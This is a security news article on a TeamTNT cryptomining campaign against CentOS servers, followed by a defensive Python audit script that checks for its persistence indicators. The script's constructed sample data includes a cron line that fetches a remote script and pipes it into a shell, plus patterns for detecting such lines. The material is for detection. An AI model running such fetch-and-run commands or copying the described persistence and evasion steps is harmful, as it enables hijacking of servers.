Group-IB Unveils CentOS Cryptojacking Attacks

The TeamTNT cybercriminal group has resurfaced with a new cryptomining campaign targeting servers running the CentOS operating system. Group-IB reports that the attackers gain access to virtual servers through brute-force attacks over SSH.

Upon gaining access, the attackers deploy a malicious script that disables protective mechanisms, erases logs, halts competing mining processes, and prevents system restoration. This series of actions lets them install the Diamorphine rootkit, which conceals malicious processes and enables remote access to the compromised hosts.

There is a moderate level of confidence among researchers that the attacks are linked to the TeamTNT group, given the resemblance to tactics and methods from its previous operations. TeamTNT was initially observed in 2019 engaging in illegal cryptocurrency mining on cloud and container platforms. Although the group claimed to have ceased activities in 2021, a resurgence of attacks attributed to them has been documented since 2022.

In the latest campaign, the malicious script first checks the infected system for signs of other cryptomining activity. It then disables security mechanisms such as SELinux, AppArmor, and the firewall. Notably, the attackers target the Aliyun.Service service associated with Alibaba's cloud subsidiary. If this service is detected, the script issues commands to remove it, freeing resources for the attackers' own operations.

Moreover, the script eliminates competitors by terminating the processes of other miners and deleting their containers and associated images. To maintain control over the server, the attackers configure cron jobs that fetch updates from a remote server every 30 minutes. They also modify the SSH authorization file, adding an account with root privileges to ensure persistent access.

To obfuscate their activities, the cybercriminals manipulate file attributes, create administrator-level accounts, and erase command histories in an effort to conceal their presence.
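As an added example (not code from Group-IB's report), here is a Python host-audit sketch that checks constructed sample command output for the persistence indicators described above: short-interval cron jobs that pipe remote content into a shell, a loaded Diamorphine module, files pinned with the immutable attribute, and SSH keys outside an operator's baseline. The sample crontab, lsmod and lsattr output, the IP address and the key comments are all constructed.

```python
import re

# Constructed stand-ins for `crontab -l`, `lsmod`, `lsattr` and authorized_keys.
CRONTAB = "0 3 * * * /usr/local/bin/backup.sh\n" \
          "*/30 * * * * curl -fsSL http://203.0.113.5/update.sh | sh\n"
LSMOD = "Module  Size  Used by\ndiamorphine 16384 0\next4 774144 1\n"
LSATTR = "----i----------------- /etc/cron.d/update\n" \
         "----------------------- /etc/hosts\n"
AUTHORIZED_KEYS = "ssh-ed25519 AAAAC3... admin@workstation\n" \
                  "ssh-rsa AAAAB3... root@unknown\n"
KNOWN_KEY_COMMENTS = {"admin@workstation"}  # operator's baseline of expected keys


def suspicious_cron(crontab):
    """Flag cron entries on a */N schedule that fetch remote content and pipe it into a shell."""
    hits = []
    for line in crontab.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6 or line.lstrip().startswith("#"):
            continue
        minute, cmd = parts[0], parts[5]
        fetches = re.search(r"\b(curl|wget)\b", cmd) and re.search(r"\|\s*(ba)?sh\b", cmd)
        if minute.startswith("*/") and fetches:
            hits.append(line)
    return hits


def rootkit_module(lsmod):
    """Report a loaded Diamorphine module. The rootkit can hide itself from lsmod,
    so a hit is the easy case and an empty result is not proof of a clean host."""
    names = [l.split()[0] for l in lsmod.splitlines()[1:] if l.strip()]
    return [n for n in names if n == "diamorphine"]


def immutable_files(lsattr):
    """Paths carrying the 'i' (immutable) attribute, often used to pin persistence files."""
    found = []
    for line in lsattr.splitlines():
        attrs, _, path = line.partition(" ")
        if "i" in attrs and path:
            found.append(path)
    return found


def unknown_keys(authorized_keys, known_comments):
    """Key lines whose comment field is not in the operator's baseline."""
    unknown = []
    for line in authorized_keys.splitlines():
        parts = line.split()
        if len(parts) >= 2 and not line.startswith("#"):
            comment = parts[2] if len(parts) > 2 else ""
            if comment not in known_comments:
                unknown.append(line)
    return unknown


def audit():
    return {"cron": suspicious_cron(CRONTAB), "rootkit": rootkit_module(LSMOD),
            "immutable": immutable_files(LSATTR),
            "keys": unknown_keys(AUTHORIZED_KEYS, KNOWN_KEY_COMMENTS)}
```

Run on a live host by replacing the constructed strings with the real command output; an empty list for every check means only that none of these specific indicators was seen.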
